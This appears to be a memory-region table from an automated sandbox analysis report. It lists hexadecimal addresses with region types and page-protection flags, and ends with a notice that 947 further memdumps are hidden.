page read and write
1100000
heap
page read and write
213EF991000
heap
page read and write
DD0000
unkown
page read and write
29B1000
heap
page read and write
271F000
stack
page read and write
29B1000
heap
page read and write
8E9C6F5000
stack
page read and write
29B1000
heap
page read and write
213EF3D7000
heap
page read and write
56A5000
system
page execute and read and write
AB0000
heap
page read and write
2E4F000
stack
page read and write
213EEAEF000
heap
page read and write
21D55A5C000
heap
page read and write
1D053798000
heap
page read and write
213EF9E6000
heap
page read and write
AA7000
unkown
page readonly
29B1000
heap
page read and write
29B1000
heap
page read and write
7B413E000
stack
page read and write
1D05512A000
heap
page read and write
213EF991000
heap
page read and write
21D3D97E000
trusted library allocation
page read and write
CB0000
unkown
page readonly
29B1000
heap
page read and write
213EEAFA000
heap
page read and write
213EEB30000
heap
page read and write
380000
unkown
page readonly
1D065520000
trusted library allocation
page read and write
213EF3A1000
heap
page read and write
296E000
stack
page read and write
213EFA0A000
heap
page read and write
10ED000
direct allocation
page execute and read and write
29B1000
heap
page read and write
7B3BFF000
stack
page read and write
7C7F000
stack
page read and write
1271000
direct allocation
page execute and read and write
7FFD34A40000
trusted library allocation
page read and write
49F2000
unclassified section
page read and write
213ED09C000
heap
page read and write
7FFD34950000
trusted library allocation
page execute and read and write
29B1000
heap
page read and write
73C000
stack
page read and write
29B1000
heap
page read and write
7FFD348A0000
trusted library allocation
page execute and read and write
7B3E78000
stack
page read and write
29B1000
heap
page read and write
21D4D65F000
trusted library allocation
page read and write
8E9C7FE000
stack
page read and write
213ED0B9000
heap
page read and write
213EEB63000
heap
page read and write
27D6000
heap
page read and write
29B1000
heap
page read and write
21D3DAE1000
trusted library allocation
page read and write
213EEB30000
heap
page read and write
DE1000
unkown
page readonly
213EFB6C000
heap
page read and write
8B0000
heap
page read and write
2782000
heap
page read and write
213EF2F3000
heap
page read and write
1D0537CF000
heap
page read and write
29B1000
heap
page read and write
213EEB30000
heap
page read and write
29B1000
heap
page read and write
5723000
system
page execute and read and write
213ED01B000
heap
page read and write
213EEAEE000
heap
page read and write
213EEAF2000
heap
page read and write
1D053868000
heap
page read and write
7FFD34940000
trusted library allocation
page execute and read and write
1D055126000
heap
page read and write
213EF3D7000
heap
page read and write
1D053890000
heap
page read and write
213EF36E000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
D70000
unkown
page readonly
29B1000
heap
page read and write
29B1000
heap
page read and write
740000
unkown
page readonly
1D05D3A6000
trusted library allocation
page read and write
29B1000
heap
page read and write
AA5000
unkown
page read and write
213ED33A000
heap
page read and write
29B1000
heap
page read and write
27F8000
heap
page read and write
76C3000
heap
page read and write
21D5585E000
heap
page read and write
213EF2F6000
heap
page read and write
1D053670000
heap
page read and write
1486EC20000
heap
page read and write
2782000
heap
page read and write
29B1000
heap
page read and write
213EFA74000
heap
page read and write
29B1000
heap
page read and write
A90000
unkown
page readonly
21D3B791000
heap
page read and write
29B1000
heap
page read and write
1D053770000
heap
page read and write
29B1000
heap
page read and write
A09617D000
stack
page read and write
890000
unkown
page read and write
213EEB36000
heap
page read and write
213EEAE5000
heap
page read and write
29B1000
heap
page read and write
390000
unkown
page readonly
213EF480000
heap
page read and write
213ED01A000
heap
page read and write
213ED0EB000
heap
page read and write
29B1000
heap
page read and write
7FFD34A30000
trusted library allocation
page read and write
280C000
heap
page read and write
E9E000
stack
page read and write
7B3EBF000
stack
page read and write
29B1000
heap
page read and write
224C000
unclassified section
page execute and read and write
29B1000
heap
page read and write
A40000
unkown
page read and write
1D0537D3000
heap
page read and write
29B1000
heap
page read and write
21D557D3000
heap
page read and write
1D05D87E000
trusted library allocation
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
2F42000
unkown
page read and write
213EF3CA000
heap
page read and write
7FFD34A70000
trusted library allocation
page read and write
26DE000
stack
page read and write
283C000
heap
page read and write
7640000
trusted library allocation
page read and write
A09637E000
stack
page read and write
7B3C7D000
stack
page read and write
213EEAFA000
heap
page read and write
29B1000
heap
page read and write
2788000
heap
page read and write
2CFE000
stack
page read and write
1D0558F8000
trusted library allocation
page read and write
27BA000
heap
page read and write
213EFA5B000
heap
page read and write
3A0000
unkown
page readonly
48B1000
direct allocation
page execute and read and write
1D05A3AB000
trusted library allocation
page read and write
A91000
unkown
page execute read
8A1000
unkown
page readonly
29B1000
heap
page read and write
29B0000
heap
page read and write
A095D3E000
stack
page read and write
7FFD34A20000
trusted library allocation
page read and write
213ED0B0000
heap
page read and write
213EEB31000
heap
page read and write
8B0000
heap
page read and write
21D3DAC1000
trusted library allocation
page read and write
29B1000
heap
page read and write
AA5000
unkown
page read and write
1129000
heap
page read and write
213EFAE3000
heap
page read and write
277E000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
7B3FB9000
stack
page read and write
21D3D779000
trusted library allocation
page read and write
213ED0B9000
heap
page read and write
213EF3D3000
heap
page read and write
27F4000
heap
page read and write
76BD000
heap
page read and write
A20000
unkown
page readonly
213ED01F000
heap
page read and write
2720000
heap
page read and write
7660000
heap
page read and write
213EF302000
heap
page read and write
7B3F38000
stack
page read and write
239B000
stack
page read and write
21D55A44000
heap
page read and write
29B1000
heap
page read and write
21D3DBBC000
trusted library allocation
page read and write
CA0000
unkown
page readonly
27E3000
heap
page read and write
1D05BA05000
trusted library allocation
page read and write
21D3DA7E000
trusted library allocation
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
213EF2F5000
heap
page read and write
740000
unkown
page readonly
213ED0D8000
heap
page read and write
213EF3D4000
heap
page read and write
D60000
unkown
page readonly
213EEB32000
heap
page read and write
21D3D2C0000
heap
page read and write
29B1000
heap
page read and write
213EF3A3000
heap
page read and write
213EEAEC000
heap
page read and write
29B1000
heap
page read and write
2654000
heap
page read and write
1210000
unkown
page readonly
213ED002000
heap
page read and write
29B1000
heap
page read and write
2CB0000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
A20000
unkown
page readonly
213EF2E0000
heap
page read and write
10E9000
direct allocation
page execute and read and write
29B1000
heap
page read and write
1D05D862000
trusted library allocation
page read and write
760000
unkown
page readonly
768F000
heap
page read and write
29B1000
heap
page read and write
213EFDB0000
heap
page read and write
213EEAE3000
heap
page read and write
277D000
heap
page read and write
2819000
heap
page read and write
7B4D0D000
stack
page read and write
7B3DFE000
stack
page read and write
213EF9E8000
heap
page read and write
1D055120000
heap
page read and write
213EF32F000
heap
page read and write
1D05C9A6000
trusted library allocation
page read and write
63A000
stack
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
1100000
heap
page read and write
21DE000
unclassified section
page execute and read and write
7750000
trusted library allocation
page read and write
1D055511000
trusted library allocation
page read and write
4450000
trusted library allocation
page read and write
140F000
stack
page read and write
AA7000
unkown
page readonly
459C000
stack
page read and write
29B1000
heap
page read and write
BB8000
heap
page read and write
7D1F000
stack
page read and write
A91000
unkown
page execute read
AA7000
unkown
page readonly
7FFD34A00000
trusted library allocation
page read and write
27F8000
heap
page read and write
21D3DA36000
trusted library allocation
page read and write
21D3D66F000
trusted library allocation
page read and write
7B3B7E000
stack
page read and write
A40000
unkown
page read and write
1D05BA09000
trusted library allocation
page read and write
1410000
unkown
page readonly
1D055060000
heap
page read and write
7FFD34AA0000
trusted library allocation
page read and write
380000
unkown
page readonly
213EF356000
heap
page read and write
351E000
unkown
page execute and read and write
A09607E000
stack
page read and write
1D053774000
heap
page read and write
44CD000
stack
page read and write
128D000
direct allocation
page execute and read and write
21D3B8D0000
heap
page read and write
213EEB07000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
213EEB30000
heap
page read and write
213ED338000
heap
page read and write
765B000
heap
page read and write
1D05636A000
trusted library allocation
page read and write
213EEC20000
heap
page read and write
213EF360000
heap
page read and write
4932000
unclassified section
page read and write
29B1000
heap
page read and write
7674000
heap
page read and write
7FFD34836000
trusted library allocation
page read and write
213EF3DF000
heap
page read and write
282C000
heap
page read and write
213EFB73000
heap
page read and write
1D05D825000
trusted library allocation
page read and write
7FFD34A90000
trusted library allocation
page read and write
21D3B6F0000
heap
page read and write
29B1000
heap
page read and write
584C000
unkown
page read and write
213EEB10000
heap
page read and write
213EF3A1000
heap
page read and write
213EFB70000
heap
page read and write
2819000
heap
page read and write
DD0000
unkown
page read and write
1D055124000
heap
page read and write
213ED335000
heap
page read and write
213EEAED000
heap
page read and write
213ED071000
heap
page read and write
AA7000
unkown
page readonly
29B1000
heap
page read and write
21D55930000
heap
page read and write
1D0550E0000
heap
page execute and read and write
45DD000
stack
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
9064000
system
page read and write
1486ECB0000
heap
page read and write
1D05D82D000
trusted library allocation
page read and write
1D055966000
trusted library allocation
page read and write
2E50000
unkown
page readonly
45E0000
direct allocation
page execute and read and write
2BF0000
unkown
page read and write
29B1000
heap
page read and write
1D05BA3B000
trusted library allocation
page read and write
213EF32F000
heap
page read and write
213EEAF7000
heap
page read and write
AA5000
unkown
page read and write
1D05ADAB000
trusted library allocation
page read and write
7FFD349E0000
trusted library allocation
page read and write
21D3B9B0000
trusted library allocation
page read and write
21D3D76B000
trusted library allocation
page read and write
213EF9AB000
heap
page read and write
A0963FE000
stack
page read and write
7FFD34782000
trusted library allocation
page read and write
2782000
heap
page read and write
17A0000
unkown
page readonly
C60000
heap
page read and write
29B1000
heap
page read and write
21D3D7B8000
trusted library allocation
page read and write
2BEE000
stack
page read and write
9BF000
stack
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
439F000
heap
page read and write
213ED33D000
heap
page read and write
213EEB1C000
heap
page read and write
213EF3CA000
heap
page read and write
27F4000
heap
page read and write
29B1000
heap
page read and write
213ED330000
heap
page read and write
213EF120000
heap
page read and write
21D3B7F6000
heap
page read and write
29B1000
heap
page read and write
455C000
heap
page read and write
1D0537A5000
heap
page read and write
29B1000
heap
page read and write
1D055902000
trusted library allocation
page read and write
29B1000
heap
page read and write
213ED33D000
heap
page read and write
21D4D651000
trusted library allocation
page read and write
7FFD3478D000
trusted library allocation
page execute and read and write
7665000
heap
page read and write
21D3DD67000
trusted library allocation
page read and write
A91000
unkown
page execute read
1D0550C0000
trusted library allocation
page read and write
213EEB03000
heap
page read and write
213ED09C000
heap
page read and write
27D6000
heap
page read and write
2851000
heap
page read and write
213EF140000
heap
page read and write
27E3000
heap
page read and write
213EEC80000
heap
page read and write
1D065756000
trusted library allocation
page read and write
2807000
heap
page read and write
213EEB30000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
213EF3A1000
heap
page read and write
213EEAF3000
heap
page read and write
7B3A72000
stack
page read and write
213ED33D000
heap
page read and write
21D55920000
heap
page execute and read and write
213EF2F0000
heap
page read and write
21D3D765000
trusted library allocation
page read and write
29B1000
heap
page read and write
2788000
heap
page read and write
213EEAF2000
heap
page read and write
4922000
direct allocation
page execute and read and write
27E3000
heap
page read and write
2807000
heap
page read and write
29B1000
heap
page read and write
254F000
stack
page read and write
213EF3A3000
heap
page read and write
213EF99A000
heap
page read and write
8E9CFFE000
stack
page read and write
2D40000
heap
page read and write
140F000
stack
page read and write
7B3D7E000
stack
page read and write
7FFD34A80000
trusted library allocation
page read and write
213EEAEC000
heap
page read and write
7B4C8E000
stack
page read and write
2837000
heap
page read and write
1D053889000
heap
page read and write
213EF9E6000
heap
page read and write
390000
unkown
page readonly
21D3B970000
trusted library allocation
page read and write
7CDE000
stack
page read and write
29B1000
heap
page read and write
21D3D300000
heap
page read and write
213EEB30000
heap
page read and write
213ED0D8000
heap
page read and write
29B1000
heap
page read and write
213ED0A0000
heap
page read and write
29B1000
heap
page read and write
2E50000
unkown
page readonly
213EF3C4000
heap
page read and write
2819000
heap
page read and write
213ED0B9000
heap
page read and write
3A740FE000
stack
page read and write
7648000
heap
page read and write
3604000
unkown
page read and write
29B1000
heap
page read and write
1486EBF0000
heap
page read and write
A90000
heap
page read and write
213EF356000
heap
page read and write
2789000
heap
page read and write
7FFD34990000
trusted library allocation
page read and write
21D55767000
heap
page read and write
213EF356000
heap
page read and write
A9E000
unkown
page readonly
8E9CBFE000
stack
page read and write
213EFA5B000
heap
page read and write
7B40BF000
stack
page read and write
21D3D7BD000
trusted library allocation
page read and write
29AF000
stack
page read and write
1486ECD0000
heap
page read and write
213EF360000
heap
page read and write
29B1000
heap
page read and write
750000
unkown
page readonly
213EF2F5000
heap
page read and write
760000
unkown
page readonly
3A741FE000
stack
page read and write
213EF3CB000
heap
page read and write
538C000
unkown
page execute and read and write
8E9CDFE000
stack
page read and write
3002000
unkown
page read and write
14870A50000
heap
page read and write
DCE000
stack
page read and write
A90000
unkown
page readonly
27FE000
heap
page read and write
27C3000
heap
page read and write
213EF3E4000
heap
page read and write
213EEB0B000
heap
page read and write
213ED01A000
heap
page read and write
213ED33D000
heap
page read and write
213ED057000
heap
page read and write
213EFB7C000
heap
page read and write
213EF3A3000
heap
page read and write
21D55A73000
heap
page read and write
4709000
direct allocation
page execute and read and write
7FFD349B0000
trusted library allocation
page read and write
29B1000
heap
page read and write
213EF090000
remote allocation
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
21D55A30000
heap
page read and write
2782000
heap
page read and write
29B1000
heap
page read and write
A0966FE000
stack
page read and write
213EFB5F000
heap
page read and write
2760000
heap
page read and write
1230000
heap
page read and write
A0962FF000
stack
page read and write
29B1000
heap
page read and write
213EEB30000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
213ED0D8000
heap
page read and write
213EF2FD000
heap
page read and write
213EF890000
heap
page read and write
2AB0000
heap
page read and write
29B1000
heap
page read and write
283C000
heap
page read and write
213EF993000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
358C000
unkown
page execute and read and write
1D0537D9000
heap
page read and write
21D3DC4F000
trusted library allocation
page read and write
213ED33D000
heap
page read and write
213EEB30000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
7FFD349A0000
trusted library allocation
page read and write
21D3D306000
heap
page read and write
29B1000
heap
page read and write
9C0000
unkown
page read and write
AC0000
unkown
page readonly
1D0550D0000
heap
page readonly
29B1000
heap
page read and write
1410000
unclassified section
page execute and read and write
2744000
heap
page read and write
29B1000
heap
page read and write
213EEAFA000
heap
page read and write
2C10000
unkown
page read and write
AFE000
stack
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
213EFB5D000
heap
page read and write
213EEB17000
heap
page read and write
A0961FE000
stack
page read and write
29B1000
heap
page read and write
450E000
stack
page read and write
21D3B700000
heap
page read and write
2690000
heap
page read and write
213ED0D8000
heap
page read and write
1D057BAB000
trusted library allocation
page read and write
213EFB78000
heap
page read and write
29B1000
heap
page read and write
7FFD349D0000
trusted library allocation
page read and write
2803000
heap
page read and write
213EEAEB000
heap
page read and write
2779000
heap
page read and write
213EF9E6000
heap
page read and write
213EEB62000
heap
page read and write
BDD000
heap
page read and write
21D3B990000
trusted library allocation
page read and write
A9E000
unkown
page readonly
5A4F000
stack
page read and write
21D3D9CE000
trusted library allocation
page read and write
45CD000
heap
page read and write
76D2000
heap
page read and write
213EEB31000
heap
page read and write
2832000
heap
page read and write
213EEB62000
heap
page read and write
213EEB2C000
heap
page read and write
21D557AD000
heap
page read and write
7FFD34866000
trusted library allocation
page execute and read and write
1108000
heap
page read and write
D80000
heap
page read and write
213EF9E6000
heap
page read and write
E5F000
stack
page read and write
29B1000
heap
page read and write
2782000
heap
page read and write
21D55927000
heap
page execute and read and write
7689000
heap
page read and write
D50000
unkown
page readonly
7B3AFE000
stack
page read and write
7BFF000
stack
page read and write
21D3D77C000
trusted library allocation
page read and write
21D3B930000
heap
page read and write
213ECFA0000
heap
page read and write
D70000
unkown
page readonly
29B1000
heap
page read and write
8E9CEFB000
stack
page read and write
29B1000
heap
page read and write
213EEB30000
heap
page read and write
21D3D2D0000
heap
page execute and read and write
CB0000
unkown
page readonly
27D6000
heap
page read and write
56A7000
system
page execute and read and write
213EEB32000
heap
page read and write
213EFA5C000
heap
page read and write
1D05592B000
trusted library allocation
page read and write
213ED0B2000
heap
page read and write
21D3D782000
trusted library allocation
page read and write
29B1000
heap
page read and write
A095DBF000
stack
page read and write
21D3DA25000
trusted library allocation
page read and write
23D8000
stack
page read and write
213EF3CA000
heap
page read and write
76BF000
heap
page read and write
2BF0000
unkown
page read and write
7B41BE000
stack
page read and write
29B1000
heap
page read and write
213EEAE0000
heap
page read and write
213ECFB0000
heap
page read and write
140F000
stack
page read and write
1D055906000
trusted library allocation
page read and write
76AD000
heap
page read and write
29B1000
heap
page read and write
7FFD34962000
trusted library allocation
page read and write
1D06557D000
trusted library allocation
page read and write
213EFA5B000
heap
page read and write
CB0000
unkown
page readonly
29B1000
heap
page read and write
280C000
heap
page read and write
95A000
stack
page read and write
21D3D6BC000
trusted library allocation
page read and write
29B1000
heap
page read and write
2610000
system
page execute and read and write
213EF9B8000
heap
page read and write
213EEB30000
heap
page read and write
A09677B000
stack
page read and write
213EF090000
remote allocation
page read and write
213EF3CA000
heap
page read and write
213ED020000
heap
page read and write
1D065511000
trusted library allocation
page read and write
29B1000
heap
page read and write
213EF360000
heap
page read and write
29B1000
heap
page read and write
F67000
unkown
page read and write
7FFD34970000
trusted library allocation
page execute and read and write
29B1000
heap
page read and write
21D55822000
heap
page read and write
D1A000
stack
page read and write
282C000
heap
page read and write
213EEAE8000
heap
page read and write
213EFB81000
heap
page read and write
29B1000
heap
page read and write
1D05BA0D000
trusted library allocation
page read and write
470D000
direct allocation
page execute and read and write
2740000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
213ED33D000
heap
page read and write
8E9CAFE000
stack
page read and write
213ED0B0000
heap
page read and write
10FC000
stack
page read and write
29B1000
heap
page read and write
1D053817000
heap
page read and write
7FFD34931000
trusted library allocation
page read and write
213EEAEC000
heap
page read and write
4558000
heap
page read and write
29B1000
heap
page read and write
8E9CCFE000
stack
page read and write
8E9C8FE000
stack
page read and write
29B1000
heap
page read and write
7FFD34980000
trusted library allocation
page read and write
29B1000
heap
page read and write
213EEAFC000
heap
page read and write
115E000
direct allocation
page execute and read and write
8A1000
unkown
page readonly
213ECFF0000
heap
page read and write
1D0537EF000
heap
page read and write
213EEB30000
heap
page read and write
29B1000
heap
page read and write
213EFAA9000
heap
page read and write
213ED0B0000
heap
page read and write
BB8000
heap
page read and write
A91000
unkown
page execute read
10FC000
stack
page read and write
A09627E000
stack
page read and write
B00000
direct allocation
page read and write
2744000
heap
page read and write
27F4000
heap
page read and write
213EFB5E000
heap
page read and write
1D0558EA000
trusted library allocation
page read and write
A1E000
stack
page read and write
213EFB20000
heap
page read and write
21D3D6E4000
trusted library allocation
page read and write
76B6000
heap
page read and write
7DF42E3D0000
trusted library allocation
page execute and read and write
1486ECB5000
heap
page read and write
21D55858000
heap
page read and write
21D5580A000
heap
page read and write
21D3B749000
heap
page read and write
56CC000
system
page execute and read and write
27C3000
heap
page read and write
2777000
heap
page read and write
750000
unkown
page readonly
89A2000
system
page read and write
29B1000
heap
page read and write
2654000
heap
page read and write
7FFD34A50000
trusted library allocation
page read and write
A9E000
unkown
page readonly
8E9D2FB000
stack
page read and write
29B1000
heap
page read and write
21D3DBFB000
trusted library allocation
page read and write
29B1000
heap
page read and write
1D053750000
heap
page read and write
1040000
unkown
page readonly
29B1000
heap
page read and write
213EEB62000
heap
page read and write
1D055733000
trusted library allocation
page read and write
213EFB5D000
heap
page read and write
7FFD34840000
trusted library allocation
page execute and read and write
21D55A58000
heap
page read and write
27BE000
heap
page read and write
7B3CFE000
stack
page read and write
21D3D77F000
trusted library allocation
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
1108000
heap
page read and write
1D056D6A000
trusted library allocation
page read and write
7FFD34920000
trusted library allocation
page read and write
213EF991000
heap
page read and write
213EF9DF000
heap
page read and write
DE1000
unkown
page readonly
2CB0000
heap
page read and write
21D3DAA0000
trusted library allocation
page read and write
213EEC85000
heap
page read and write
29B1000
heap
page read and write
21D3D651000
trusted library allocation
page read and write
29B1000
heap
page read and write
213ED057000
heap
page read and write
BB0000
heap
page read and write
27FE000
heap
page read and write
213EF3DC000
heap
page read and write
364C000
unclassified section
page execute and read and write
770000
heap
page read and write
213ED33D000
heap
page read and write
29B1000
heap
page read and write
213EEAE4000
heap
page read and write
29B1000
heap
page read and write
BB0000
heap
page read and write
213EF3A3000
heap
page read and write
A0960FE000
stack
page read and write
1D0558F4000
trusted library allocation
page read and write
29B1000
heap
page read and write
1D0537DB000
heap
page read and write
29B1000
heap
page read and write
27C3000
heap
page read and write
213ED019000
heap
page read and write
21D55950000
heap
page read and write
2CB4000
heap
page read and write
1D0550A0000
trusted library allocation
page read and write
D60000
unkown
page readonly
76D0000
heap
page read and write
17A1000
unkown
page readonly
213EEC90000
heap
page read and write
29B1000
heap
page read and write
27CD000
heap
page read and write
213ED02F000
heap
page read and write
213ED0B2000
heap
page read and write
29B1000
heap
page read and write
21D3BA00000
heap
page read and write
890000
unkown
page read and write
F6A000
unkown
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
21D3BA05000
heap
page read and write
213EF3A1000
heap
page read and write
1308000
direct allocation
page execute and read and write
213EEAE5000
heap
page read and write
29B1000
heap
page read and write
85C000
stack
page read and write
29B1000
heap
page read and write
8E9D0FD000
stack
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
21D55D50000
heap
page read and write
213ED049000
heap
page read and write
2F42000
unkown
page read and write
29B1000
heap
page read and write
1D0550F0000
trusted library allocation
page read and write
213EEAF2000
heap
page read and write
213ED0EC000
heap
page read and write
477E000
direct allocation
page execute and read and write
1D055500000
heap
page read and write
2782000
heap
page read and write
21D3B769000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
2D40000
heap
page read and write
2851000
heap
page read and write
2C6C000
unkown
page read and write
2803000
heap
page read and write
B68000
heap
page read and write
213ECFD0000
heap
page read and write
2768000
heap
page read and write
21D55760000
heap
page read and write
21D4D6BD000
trusted library allocation
page read and write
213EEAE1000
heap
page read and write
7650000
heap
page read and write
29B1000
heap
page read and write
9B0000
heap
page read and write
1D0599AB000
trusted library allocation
page read and write
213EEAE1000
heap
page read and write
213EF3C3000
heap
page read and write
2550000
heap
page read and write
29B1000
heap
page read and write
43A0000
trusted library allocation
page execute and read and write
27F8000
heap
page read and write
29B1000
heap
page read and write
213EEB35000
heap
page read and write
7FFD3493A000
trusted library allocation
page read and write
29B1000
heap
page read and write
213ED0B2000
heap
page read and write
29B1000
heap
page read and write
213EF3A3000
heap
page read and write
1D05DB44000
trusted library allocation
page read and write
213ED01C000
heap
page read and write
7FFD34A10000
trusted library allocation
page read and write
27D0000
heap
page read and write
213EFB67000
heap
page read and write
21D3B9A0000
heap
page readonly
27BE000
heap
page read and write
There are 947 hidden memdumps, click here to show them.